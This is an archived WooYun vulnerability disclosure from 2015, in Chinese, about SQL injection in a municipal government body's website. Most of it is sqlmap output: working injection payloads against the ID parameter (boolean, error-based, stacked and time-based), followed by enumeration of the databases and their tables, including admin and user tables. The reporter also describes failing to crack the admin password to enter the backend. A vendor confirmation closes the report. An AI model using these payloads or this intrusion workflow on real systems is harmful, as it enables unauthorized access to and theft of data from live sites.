乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-19: 细节已通知厂商并且等待厂商处理中 2015-09-23: 厂商已经确认,细节仅向厂商公开 2015-10-03: 细节向核心白帽子及相关领域专家公开 2015-10-13: 细节向普通白帽子公开 2015-10-23: 细节向实习白帽子公开 2015-11-07: 细节向公众公开
某市机构编制委员会存在SQL注射
http://**.**.**.**/AnnShow.aspx?ID=37 (GET)
sqlmap identified the following injection points with a total of 90 HTTP(s) requests:---Parameter: ID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ID=37 AND 2648=2648 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: ID=37 AND 2579=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(112)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (2579=2579) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(107)+CHAR(113))) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: ID=37; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: ID=37 WAITFOR DELAY '0:0:5'-----web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: ID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ID=37 AND 2648=2648 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: ID=37 AND 2579=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(112)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (2579=2579) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(107)+CHAR(113))) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: ID=37; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: ID=37 WAITFOR DELAY '0:0:5'-----web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008available databases [5]:[*] 5[*] JGBJ[*] master[*] model[*] msdbsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: ID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ID=37 AND 2648=2648 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: ID=37 AND 2579=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(112)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (2579=2579) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(107)+CHAR(113))) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: ID=37; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: ID=37 WAITFOR DELAY '0:0:5'-----web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008available databases [5]:[*] 5[*] JGBJ[*] master[*] model[*] msdbDatabase: master+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| sys.messages | 67941 || sys.sysmessages | 67941 || sys.syscolumns | 10642 || sys.all_parameters | 6697 || sys.system_parameters | 6697 || sys.trace_subclass_values | 4722 || sys.trace_event_bindings | 3958 || sys.all_columns | 3740 || sys.system_columns | 3696 || sys.syscomments | 2744 || dbo.spt_values | 2346 || sys.all_objects | 1747 || sys.sysobjects | 1747 || sys.system_objects | 1741 || sys.database_permissions | 1641 || sys.syspermissions | 1641 || sys.sysprotects | 1640 || sys.all_sql_modules | 1589 || sys.system_sql_modules | 1589 || sys.all_views | 284 || sys.system_views | 284 || sys.event_notification_event_types | 193 || sys.trace_events | 171 || sys.syscharsets | 114 || sys.allocation_units | 112 || sys.dm_db_partition_stats | 101 || sys.partitions | 101 || sys.system_components_surface_area_configuration | 98 || sys.xml_schema_facets | 97 || sys.xml_schema_components | 93 || sys.xml_schema_types | 77 || sys.trace_columns | 65 || sys.configurations | 62 || sys.sysconfigures | 62 || sys.syscurconfigs | 62 || sys.fulltext_document_types | 50 || sys.fulltext_languages | 48 || INFORMATION_SCHEMA.COLUMN_PRIVILEGES | 44 || INFORMATION_SCHEMA.COLUMNS | 44 || sys.columns | 44 || sys.syslanguages | 33 || sys.systypes | 27 || sys.types | 27 || sys.securable_classes | 21 || sys.trace_categories | 21 || sys.xml_schema_component_placements | 17 || INFORMATION_SCHEMA.SCHEMATA | 14 || sys.database_principals | 14 || sys.login_token | 14 || sys.schemas | 14 || sys.sysusers | 14 || sys.xml_schema_attributes | 14 || sys.server_principals | 11 || sys.service_contract_message_usages | 11 || sys.server_permissions | 7 || sys.sysindexes | 7 || sys.indexes | 6 || sys.objects | 6 || sys.stats_columns | 6 || INFORMATION_SCHEMA.TABLE_PRIVILEGES | 5 || INFORMATION_SCHEMA.TABLES | 5 || sys.database_mirroring | 5 || sys.database_recovery_status | 5 || sys.databases | 5 || sys.index_columns | 5 || sys.sysdatabases | 5 || sys.sysindexkeys | 5 || sys.tables | 5 || sys.endpoints | 4 || sys.service_queue_usages | 3 || sys.stats | 3 || sys.syssegments | 3 || sys.xml_schema_namespaces | 3 || sys.database_files | 2 || sys.service_contract_usages | 2 || sys.sysfiles | 2 || sys.syslogins | 2 || sys.user_token | 2 || dbo.spt_monitor | 1 || sys.data_spaces | 1 || sys.database_role_members | 1 || sys.default_constraints | 1 || sys.dm_exec_requests | 1 || sys.dm_exec_sessions | 1 || sys.filegroups | 1 || sys.server_role_members | 1 || sys.servers | 1 || sys.sql_logins | 1 || sys.sysconstraints | 1 || sys.sysfilegroups | 1 || sys.sysmembers | 1 || sys.sysprocesses | 1 || sys.sysservers | 1 || sys.tcp_endpoints | 1 || sys.via_endpoints | 1 || sys.xml_schema_collections | 1 || sys.xml_schema_model_groups | 1 || sys.xml_schema_wildcards | 1 |+--------------------------------------------------+---------+Database: JGBJ+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| dbo.C_MailBox | 2783 || dbo.C_Msg | 2188 || dbo.C_News | 424 || dbo.C_MenuFunction | 56 || dbo.C_FW | 55 || dbo.temp | 42 || dbo.C_Video | 32 || dbo.C_FriendSite | 31 || dbo.C_Hn | 23 || dbo.C_Announce | 21 || dbo.C_ZC | 21 || dbo.C_Business | 18 || dbo.C_SD | 16 || dbo.C_File | 15 || dbo.C_Hn_Type | 12 || dbo.C_Announce_Type | 6 || dbo.C_FW_Type | 6 || dbo.C_ZC_Type | 6 || dbo.C_MenuSubFunction | 5 || dbo.C_Video_Type | 5 || dbo.C_XXGK_Type | 5 || dbo.C_Introduce | 4 || dbo.C_News_Type | 3 || dbo.C_UsersNews | 3 || dbo.D99_CMD | 3 || dbo.D99_Tmp | 3 || dbo.C_Admin | 2 || dbo.C_Business_Type | 2 || dbo.C_SD_Type | 2 || dbo.C_User | 2 || dbo.C_Users_Type | 2 || dbo.C_File_Type | 1 || dbo.C_Lead | 1 |+--------------------------------------------------+---------+
本来想进后台看看的奈何密码太变态,没解出来后台:http://**.**.**.**/WebSys/SysLogin.aspx
所以没进去。。。
危害等级:高
漏洞Rank:10
确认时间:2015-09-23 14:50
非常感谢您的报告。报告中的问题已确认并复现.影响的数据:高攻击成本:低造成影响:高综合评级为:高,rank:10正在联系相关网站管理单位处置。
暂无